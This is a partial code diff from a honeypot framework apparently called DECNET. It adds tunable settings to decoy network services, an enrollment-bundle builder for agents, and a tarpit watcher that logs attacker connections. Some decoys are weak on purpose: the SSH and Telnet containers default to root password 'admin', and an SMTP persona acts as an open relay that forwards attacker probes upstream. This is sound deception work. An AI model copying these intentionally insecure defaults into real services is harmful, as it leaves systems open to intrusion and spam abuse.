ServiceConfigField(
key="server_header",
label="Server header",
type="string",
placeholder="Apache/2.4.41 (Ubuntu)",
help="Value sent in the HTTP Server: response header.",
),
ServiceConfigField(
key="response_code",
label="Default response code",
type="int",
default=200,
),
ServiceConfigField(
key="fake_app",
label="Fake application",
type="enum",
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
default="none",
help="Pre-baked application skin to render on the index page.",
),
ServiceConfigField(
key="extra_headers",
label="Extra headers (JSON or raw)",
type="textarea",
placeholder='{"X-Powered-By": "PHP/7.4.3"}',
),
ServiceConfigField(
key="custom_body",
label="Custom response body",
type="textarea",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -1,6 +1,6 @@
import json
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https"
@@ -10,6 +10,57 @@ class HTTPSService(BaseService):
ports = [443]
default_image = "build"
config_schema = [
ServiceConfigField(
key="server_header",
label="Server header",
type="string",
placeholder="nginx/1.18.0",
),
ServiceConfigField(
key="response_code",
label="Default response code",
type="int",
default=200,
),
ServiceConfigField(
key="fake_app",
label="Fake application",
type="enum",
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
default="none",
),
ServiceConfigField(
key="extra_headers",
label="Extra headers (JSON or raw)",
type="textarea",
),
ServiceConfigField(
key="custom_body",
label="Custom response body",
type="textarea",
),
ServiceConfigField(
key="tls_cn",
label="TLS certificate CN",
type="string",
placeholder="mail.corp.local",
help="Common Name baked into the self-signed cert if no cert/key provided.",
),
ServiceConfigField(
key="tls_cert",
label="TLS certificate (PEM)",
type="textarea",
secret=True,
),
ServiceConfigField(
key="tls_key",
label="TLS private key (PEM)",
type="textarea",
secret=True,
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -8,6 +8,7 @@ class IMAPService(BaseService):
name = "imap"
ports = [143, 993]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class KubernetesAPIService(BaseService):
name = "k8s"
ports = [6443, 8080]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class LDAPService(BaseService):
name = "ldap"
ports = [389, 636]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -15,6 +15,7 @@ class LLMNRService(BaseService):
name = "llmnr"
ports = [5355, 5353]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class MongoDBService(BaseService):
name = "mongodb"
ports = [27017]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class MQTTService(BaseService):
name = "mqtt"
ports = [1883]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class MSSQLService(BaseService):
name = "mssql"
ports = [1433]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,5 +1,5 @@
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql"
@@ -9,6 +9,16 @@ class MySQLService(BaseService):
ports = [3306]
default_image = "build"
config_schema = [
ServiceConfigField(
key="version",
label="Advertised MySQL version",
type="string",
placeholder="8.0.36",
help="Sets the version banner the fake MySQL handshake reports.",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -8,6 +8,7 @@ class POP3Service(BaseService):
name = "pop3"
ports = [110, 995]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class PostgresService(BaseService):
name = "postgres"
ports = [5432]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,5 +1,5 @@
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "rdp"
@@ -9,6 +9,19 @@ class RDPService(BaseService):
ports = [3389]
default_image = "build"
config_schema = [
ServiceConfigField(
key="nla",
label="Enable CredSSP / NLA",
type="bool",
default=False,
help=(
"Off by default — basic X.224 cookie capture is enough for most "
"attacker traffic and avoids the openssl cert-gen at container start."
),
),
]
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {
"build": {"context": str(TEMPLATES_DIR)},

View File

@@ -1,5 +1,5 @@
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis"
@@ -9,6 +9,23 @@ class RedisService(BaseService):
ports = [6379]
default_image = "build"
config_schema = [
ServiceConfigField(
key="version",
label="Advertised Redis version",
type="string",
placeholder="7.2.4",
help="Reported by INFO server -> redis_version.",
),
ServiceConfigField(
key="os_string",
label="Advertised OS string",
type="string",
placeholder="Linux 5.15.0 x86_64",
help="Reported by INFO server -> os.",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -28,7 +28,7 @@ def _load_plugins() -> None:
for cls in BaseService.__subclasses__():
if not cls.__module__.startswith("decnet.services."):
continue
instance = cls()
instance = cls() # type: ignore[abstract]
_registry[instance.name] = instance
_loaded = True

View File

@@ -8,6 +8,7 @@ class SIPService(BaseService):
name = "sip"
ports = [5060]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class SMBService(BaseService):
name = "smb"
ports = [445, 139]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp"
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
@@ -16,6 +16,24 @@ class SMTPService(BaseService):
ports = [25, 587]
default_image = "build"
config_schema = [
ServiceConfigField(
key="banner",
label="SMTP greeting banner",
type="string",
placeholder="mail.corp.local ESMTP Postfix",
help="First line returned on TCP connect (220 ...).",
),
ServiceConfigField(
key="mta",
label="MTA persona",
type="enum",
enum=["postfix", "exim", "sendmail"],
default="postfix",
help="Shapes EHLO capability list and error wording.",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
# Reuses the same template as the smtp service — only difference is
# SMTP_OPEN_RELAY=1 in the environment, which enables the open relay persona.
@@ -18,6 +18,64 @@ class SMTPRelayService(BaseService):
ports = [25, 587]
default_image = "build"
config_schema = [
ServiceConfigField(
key="banner",
label="SMTP greeting banner",
type="string",
placeholder="mail.corp.local ESMTP Postfix",
help="First line returned on TCP connect (220 ...).",
),
ServiceConfigField(
key="mta",
label="MTA persona",
type="enum",
enum=["postfix", "exim", "sendmail"],
default="postfix",
help="Shapes EHLO capability list and error wording.",
),
ServiceConfigField(
key="upstream_host",
label="Upstream relay host",
type="string",
placeholder="smtp.sendgrid.net",
help="Real SMTP relay used to forward probe emails. Leave blank to disable forwarding.",
),
ServiceConfigField(
key="upstream_port",
label="Upstream relay port",
type="int",
default=25,
help="Port on the upstream relay (25 or 587).",
),
ServiceConfigField(
key="upstream_user",
label="Upstream relay username",
type="string",
help="AUTH username for the upstream relay (optional).",
),
ServiceConfigField(
key="upstream_pass",
label="Upstream relay password",
type="string",
help="AUTH password for the upstream relay (optional).",
),
ServiceConfigField(
key="upstream_sender",
label="Upstream envelope sender",
type="string",
placeholder="probe@yourdomain.com",
help="Envelope MAIL FROM used when talking to the upstream relay. Set this to an address your server is authorised to send from so SPF passes at the recipient. The attacker's From: header inside the message is untouched.",
),
ServiceConfigField(
key="probe_limit",
label="Probe forward limit",
type="int",
default=1,
help="Number of emails per source IP to actually deliver upstream. All subsequent emails are silently quarantined.",
),
]
def compose_fragment(
self,
decky_name: str,
@@ -33,6 +91,7 @@ class SMTPRelayService(BaseService):
"cap_add": ["NET_BIND_SERVICE"],
"environment": {
"NODE_NAME": decky_name,
"SMTP_SERVICE_NAME": "smtp_relay",
"SMTP_OPEN_RELAY": "1",
"SMTP_QUARANTINE_DIR": _IN_CONTAINER_QUARANTINE,
},

View File

@@ -16,6 +16,7 @@ class SnifferService(BaseService):
name = "sniffer"
ports: list[int] = []
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
fleet_singleton = True
def compose_fragment(

View File

@@ -8,6 +8,7 @@ class SNMPService(BaseService):
name = "snmp"
ports = [161]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "ssh"
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
@@ -25,6 +25,27 @@ class SSHService(BaseService):
ports = [22]
default_image = "build"
config_schema = [
ServiceConfigField(
key="password",
label="Root password",
type="password",
default="admin",
secret=True,
help="Plaintext root password for the in-container sshd.",
),
ServiceConfigField(
key="hostname",
label="Container hostname",
type="string",
help=(
"Cosmetic override for the SSH banner/PS1 — keeps the decoy "
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
),
placeholder="e.g. mail-01.corp.local",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet"
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
@@ -24,6 +24,27 @@ class TelnetService(BaseService):
ports = [23]
default_image = "build"
config_schema = [
ServiceConfigField(
key="password",
label="Root password",
type="password",
default="admin",
secret=True,
help="Plaintext root password for the in-container telnetd.",
),
ServiceConfigField(
key="hostname",
label="Container hostname",
type="string",
placeholder="e.g. mail-01.corp.local",
help=(
"Cosmetic override for the telnet banner — keeps decoys "
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
),
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -8,6 +8,7 @@ class TFTPService(BaseService):
name = "tftp"
ports = [69]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class VNCService(BaseService):
name = "vnc"
ports = [5900]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -0,0 +1,209 @@
"""Tarball + bootstrap construction for agent-enrollment bundles.
Pure I/O, no FastAPI dependency — independently testable.
"""
from __future__ import annotations
import io
import os
import pathlib
import tarfile
from datetime import datetime, timezone
from typing import Optional
from decnet.swarm import pki
# ---------------------------------------------------------------------------
# Include / exclude manifest
# ---------------------------------------------------------------------------
# Explicit include list — fails closed. Stray files on the master
# (dev venvs, .env files, editor scratch) cannot leak into the bundle.
_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",)
_INCLUDED_DIRS: tuple[str, ...] = ("decnet",)
# Subtrees of _INCLUDED_DIRS that must NOT ship (relative to repo root).
# * decnet/web — FastAPI master app, unused on agents.
# * decnet/mutator — swarm-wide respawn scheduler, master-only.
# * decnet/profiler — rebuilds profiles against master DB, master-only.
_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({
"decnet/web",
"decnet/mutator",
"decnet/profiler",
})
# Agent-side systemd units. Profiler stays master-side intentionally.
_SYSTEMD_UNITS = (
"decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater",
"decnet-collector", "decnet-prober", "decnet-sniffer",
)
# ---------------------------------------------------------------------------
# Path helpers
# ---------------------------------------------------------------------------
def _repo_root() -> pathlib.Path:
# decnet/swarm/bundle_builder.py -> parents[2] = repo root.
return pathlib.Path(__file__).resolve().parents[2]
def _templates_dir() -> pathlib.Path:
return pathlib.Path(__file__).resolve().parents[1] / "web" / "templates"
# ---------------------------------------------------------------------------
# Filesystem walk
# ---------------------------------------------------------------------------
def _iter_included(root: pathlib.Path) -> list[tuple[pathlib.Path, str]]:
"""Return ``(full_path, arcname)`` pairs for every file the agent needs.
Walk is pruned in-place: ``__pycache__`` and master-only subtrees are
skipped at directory level so we never descend into them.
"""
found: list[tuple[pathlib.Path, str]] = []
for rel in _INCLUDED_ROOT_FILES:
p = root / rel
if p.is_file():
found.append((p, rel))
for top in _INCLUDED_DIRS:
start = root / top
if not start.is_dir():
continue
for dirpath, dirnames, filenames in os.walk(start, topdown=True, followlinks=False):
dir_path = pathlib.Path(dirpath)
rel_dir = dir_path.relative_to(root).as_posix()
dirnames[:] = [
d for d in dirnames
if d != "__pycache__"
and f"{rel_dir}/{d}" not in _EXCLUDED_DECNET_SUBTREES
]
for fn in filenames:
if fn.endswith((".pyc", ".pyo")):
continue
full = dir_path / fn
if full.is_symlink():
continue
found.append((full, f"{rel_dir}/{fn}"))
found.sort(key=lambda t: t[1])
return found
# ---------------------------------------------------------------------------
# Content renderers
# ---------------------------------------------------------------------------
def _render_decnet_ini(
master_host: str,
host_uuid: str,
use_ipvlan: bool = False,
swarmctl_port: int = 8770,
) -> bytes:
ipvlan_line = f"ipvlan = {'true' if use_ipvlan else 'false'}\n"
return (
"; Generated by DECNET agent-enrollment bundle.\n"
"[decnet]\n"
"mode = agent\n"
"disallow-master = true\n"
"log-directory = /var/log/decnet\n"
f"{ipvlan_line}"
"\n"
"[agent]\n"
f"master-host = {master_host}\n"
f"swarmctl-port = {swarmctl_port}\n"
"swarm-syslog-port = 6514\n"
"agent-port = 8765\n"
"agent-dir = /etc/decnet/agent\n"
"updater-dir = /etc/decnet/updater\n"
f"host-uuid = {host_uuid}\n"
).encode()
def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None:
info = tarfile.TarInfo(name)
info.size = len(data)
info.mode = mode
info.mtime = int(datetime.now(timezone.utc).timestamp())
tar.addfile(info, io.BytesIO(data))
def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes:
tpl_path = _templates_dir() / f"{name}.service.j2"
tpl = tpl_path.read_text()
return (
tpl.replace("{{ agent_name }}", agent_name)
.replace("{{ master_host }}", master_host)
).encode()
def render_bootstrap(
agent_name: str,
master_host: str,
tarball_url: str,
expires_at: datetime,
with_updater: bool,
) -> bytes:
tpl_path = _templates_dir() / "enroll_bootstrap.sh.j2"
tpl = tpl_path.read_text()
now = datetime.now(timezone.utc).replace(microsecond=0).isoformat()
rendered = (
tpl.replace("{{ agent_name }}", agent_name)
.replace("{{ master_host }}", master_host)
.replace("{{ tarball_url }}", tarball_url)
.replace("{{ generated_at }}", now)
.replace("{{ expires_at }}", expires_at.replace(microsecond=0).isoformat())
.replace("{{ with_updater }}", "true" if with_updater else "false")
)
return rendered.encode()
# ---------------------------------------------------------------------------
# Public API
# ---------------------------------------------------------------------------
def build_tarball(
master_host: str,
agent_name: str,
host_uuid: str,
issued: pki.IssuedCert,
services_ini: Optional[str],
updater_issued: Optional[pki.IssuedCert] = None,
use_ipvlan: bool = False,
) -> bytes:
"""Return a gzipped tarball ready to be handed to the enrolling agent."""
root = _repo_root()
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
for path, arcname in _iter_included(root):
tar.add(path, arcname=arcname, recursive=False)
_add_bytes(
tar,
"etc/decnet/decnet.ini",
_render_decnet_ini(master_host, host_uuid, use_ipvlan),
)
for unit in _SYSTEMD_UNITS:
_add_bytes(
tar,
f"etc/systemd/system/{unit}.service",
_render_systemd_unit(unit, agent_name, master_host),
)
_add_bytes(tar, "home/.decnet/agent/ca.crt", issued.ca_cert_pem)
_add_bytes(tar, "home/.decnet/agent/worker.crt", issued.cert_pem)
_add_bytes(tar, "home/.decnet/agent/worker.key", issued.key_pem, mode=0o600)
if updater_issued is not None:
_add_bytes(tar, "home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem)
_add_bytes(tar, "home/.decnet/updater/updater.crt", updater_issued.cert_pem)
_add_bytes(tar, "home/.decnet/updater/updater.key", updater_issued.key_pem, mode=0o600)
if services_ini:
_add_bytes(tar, "services.ini", services_ini.encode())
return buf.getvalue()

View File

@@ -0,0 +1,3 @@
from .worker import tarpit_watcher_worker
__all__ = ["tarpit_watcher_worker"]

208
decnet/tarpit/worker.py Normal file
View File

@@ -0,0 +1,208 @@
"""Tarpit connection watcher — edge-triggered enter/exit log events.
Polls active tarpit rules every ``DECNET_TARPIT_POLL_INTERVAL`` seconds
(default 15). For each rule, reads ``/proc/{pid}/net/tcp`` on the host
(no docker exec, no ss needed inside the container) to find ESTABLISHED
connections on the tarpitted ports. Emits structured log events:
* ``tarpit_enter`` — new connection seen on a tarpitted port
* ``tarpit_exit`` — connection gone; includes elapsed time in seconds
Runs embedded in the API process (always-on, near-zero cost when no
rules exist).
"""
from __future__ import annotations
import asyncio
import json
import socket
from datetime import datetime, timezone
from typing import Any, Optional
from decnet.decky_io.resolve import resolve_decky_container
from decnet.logging import get_logger
from decnet.network import get_container_pid
from decnet.web.db.repository import BaseRepository
log = get_logger("tarpit.watcher")
_POLL_INTERVAL_ENV = "DECNET_TARPIT_POLL_INTERVAL"
_DEFAULT_POLL_S = 15
_TCP_ESTABLISHED = "01"
def _read_proc_net_tcp(pid: int) -> str:
"""Read /proc/{pid}/net/tcp from the host (namespace-aware symlink)."""
path = f"/proc/{pid}/net/tcp"
try:
with open(path) as f:
return f.read()
except OSError:
return ""
def _parse_connections(content: str, target_port: int) -> list[str]:
"""Return list of remote IPs in ESTABLISHED state on target_port."""
ips: list[str] = []
for line in content.strip().splitlines()[1:]:
parts = line.split()
if len(parts) < 4:
continue
local_hex, rem_hex, state = parts[1], parts[2], parts[3]
if state != _TCP_ESTABLISHED:
continue
local_port = int(local_hex.split(":")[1], 16)
if local_port != target_port:
continue
rem_ip_hex = rem_hex.split(":")[0]
try:
ip_bytes = bytes.fromhex(rem_ip_hex)[::-1]
ip = socket.inet_ntoa(ip_bytes)
except (ValueError, OSError):
continue
if ip != "0.0.0.0": # nosec B104
ips.append(ip)
return ips
def _get_poll_interval() -> int:
import os
try:
return int(os.environ.get(_POLL_INTERVAL_ENV, _DEFAULT_POLL_S))
except (TypeError, ValueError):
return _DEFAULT_POLL_S
async def _get_attacker_uuid(repo: BaseRepository, ip: str) -> Optional[str]:
try:
from decnet.web.db.models import Attacker
from sqlalchemy import select
async with repo._session() as session: # type: ignore[attr-defined]
result = await session.execute(
select(Attacker).where(Attacker.ip == ip) # type: ignore[arg-type]
)
row = result.scalar_one_or_none()
return row.uuid if row else None
except Exception:
return None
async def _emit_log(
repo: BaseRepository,
*,
event_type: str,
decky_name: str,
src_ip: str,
port: int,
extra: dict[str, Any] | None = None,
) -> None:
attacker_uuid = await _get_attacker_uuid(repo, src_ip)
fields: dict[str, Any] = {"port": port, "attacker_uuid": attacker_uuid}
if extra:
fields.update(extra)
try:
await repo.add_log({
"decky": decky_name,
"service": "tarpit",
"event_type": event_type,
"attacker_ip": src_ip,
"raw_line": f"tarpit {event_type} src={src_ip} decky={decky_name} port={port}",
"fields": json.dumps(fields),
})
except Exception as exc:
log.warning("tarpit log emit failed: %s", exc)
async def tarpit_watcher_worker(repo: BaseRepository) -> None:
"""Main loop — runs forever, wakes every DECNET_TARPIT_POLL_INTERVAL seconds."""
poll_interval = _get_poll_interval()
log.info("tarpit watcher started poll_interval=%ds", poll_interval)
# (decky_name, src_ip, port) → first_seen timestamp
seen: dict[tuple[str, str, int], datetime] = {}
while True:
try:
await _tick(repo, seen)
except asyncio.CancelledError:
raise
except Exception as exc:
log.warning("tarpit watcher tick error: %s", exc)
await asyncio.sleep(poll_interval)
async def _tick(
repo: BaseRepository,
seen: dict[tuple[str, str, int], datetime],
) -> None:
rules = await repo.list_tarpit_rules()
if not rules:
# No active tarpit rules — clear stale seen state and bail early.
seen.clear()
return
current: set[tuple[str, str, int]] = set()
for rule in rules:
db_key: str = rule["decky_name"]
ports: list[int] = rule["ports"]
# Topology deckies are stored as "t:{topology_id}:{decky_name}".
# Resolve the real container name before asking Docker for its PID.
if db_key.startswith("t:"):
_, topology_id, decky_name = db_key.split(":", 2)
try:
container = await resolve_decky_container(
repo, decky_name, topology_id=topology_id,
)
except LookupError as exc:
log.debug("tarpit watcher: %s", exc)
continue
else:
decky_name = db_key
container = db_key
try:
pid = await asyncio.to_thread(get_container_pid, container)
except LookupError as exc:
log.debug("tarpit watcher: %s", exc)
continue
tcp_content = await asyncio.to_thread(_read_proc_net_tcp, pid)
for port in ports:
for src_ip in _parse_connections(tcp_content, port):
key = (decky_name, src_ip, port)
current.add(key)
if key not in seen:
seen[key] = datetime.now(timezone.utc)
log.info(
"tarpit enter decky=%s src=%s port=%d",
decky_name, src_ip, port,
)
await _emit_log(
repo,
event_type="tarpit_enter",
decky_name=decky_name,
src_ip=src_ip,
port=port,
)
for key in list(seen):
if key not in current:
first_seen = seen.pop(key)
elapsed = int((datetime.now(timezone.utc) - first_seen).total_seconds())
decky_name, src_ip, port = key
log.info(
"tarpit exit decky=%s src=%s port=%d elapsed=%ds",
decky_name, src_ip, port, elapsed,
)
await _emit_log(
repo,
event_type="tarpit_exit",
decky_name=decky_name,
src_ip=src_ip,
port=port,
extra={"duration_s": elapsed},
)

View File

@@ -138,7 +138,7 @@ def traced(fn: F) -> F: ...
def traced(name: str) -> Callable[[F], F]: ...
def traced(fn: Any = None, *, name: str | None = None) -> Any:
def traced(fn: Any = None, *, name: str | None = None) -> Any: # type: ignore[misc]
"""Decorator that wraps a function in an OTEL span.
Usage::
@@ -168,9 +168,9 @@ def traced(fn: Any = None, *, name: str | None = None) -> Any:
# Called as @traced (no arguments)
return _wrap(fn, None)
# Fallback: @traced() with no args
def decorator(f: F) -> F:
def _fallback_decorator(f: F) -> F:
return _wrap(f, name)
return decorator
return _fallback_decorator
def _wrap(fn: F, span_name: str | None) -> F:

View File

@@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]:
if domain:
principal = f"{domain}\\{username}"
else:
principal = username or None
principal = username
return {
"username": username,

View File

@@ -128,6 +128,9 @@ def main():
signal.signal(signal.SIGINT, _forward)
try:
if proc.stdout is None:
proc.wait()
return
for raw_line in proc.stdout:
line = raw_line.rstrip()
if not line:

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -94,7 +94,7 @@ class ESHandler(BaseHTTPRequestHandler):
server_version = "elasticsearch"
sys_version = ""
def _send_json(self, code: int, data: dict) -> None:
def _send_json(self, code: int, data: dict | list) -> None:
body = json.dumps(data).encode()
self.send_response(code)
self.send_header("Content-Type", "application/json; charset=UTF-8")

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -7,9 +7,12 @@ forwards events as JSON to LOG_TARGET if set.
import os
from pathlib import Path
from typing import cast
from twisted.internet import defer, reactor
from twisted.internet.interfaces import IReactorTCP
from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell
from twisted.python.failure import Failure
from twisted.python.filepath import FilePath
from twisted.python import log as twisted_log
@@ -95,7 +98,8 @@ _BAIT_PATH = _setup_bait_fs()
class ServerFTP(FTP):
def connectionMade(self):
peer = self.transport.getPeer()
assert self.transport is not None
peer = self.transport.getPeer() # type: ignore[misc]
_log("connection", src_ip=peer.host, src_port=peer.port)
super().connectionMade()
@@ -120,15 +124,16 @@ class ServerFTP(FTP):
return defer.succeed((530, "Login incorrect."))
self.state = self.AUTHED
self._user = getattr(self, "_server_user", "anonymous")
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH))
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) # type: ignore[assignment]
return defer.succeed((230, "Login successful."))
def ftp_RETR(self, path):
_log("download_attempt", path=path)
return super().ftp_RETR(path)
def connectionLost(self, reason):
peer = self.transport.getPeer()
def connectionLost(self, reason: Failure) -> None: # type: ignore[override]
assert self.transport is not None
peer = self.transport.getPeer() # type: ignore[misc]
_log("disconnect", src_ip=peer.host, src_port=peer.port)
super().connectionLost(reason)
@@ -140,5 +145,5 @@ class ServerFTPFactory(FTPFactory):
if __name__ == "__main__":
twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False)
_log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}")
reactor.listenTCP(PORT, ServerFTPFactory())
reactor.run()
cast(IReactorTCP, reactor).listenTCP(PORT, ServerFTPFactory()) # type: ignore[arg-type]
reactor.run() # type: ignore[attr-defined]

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

Some files were not shown because too many files have changed in this diff Show More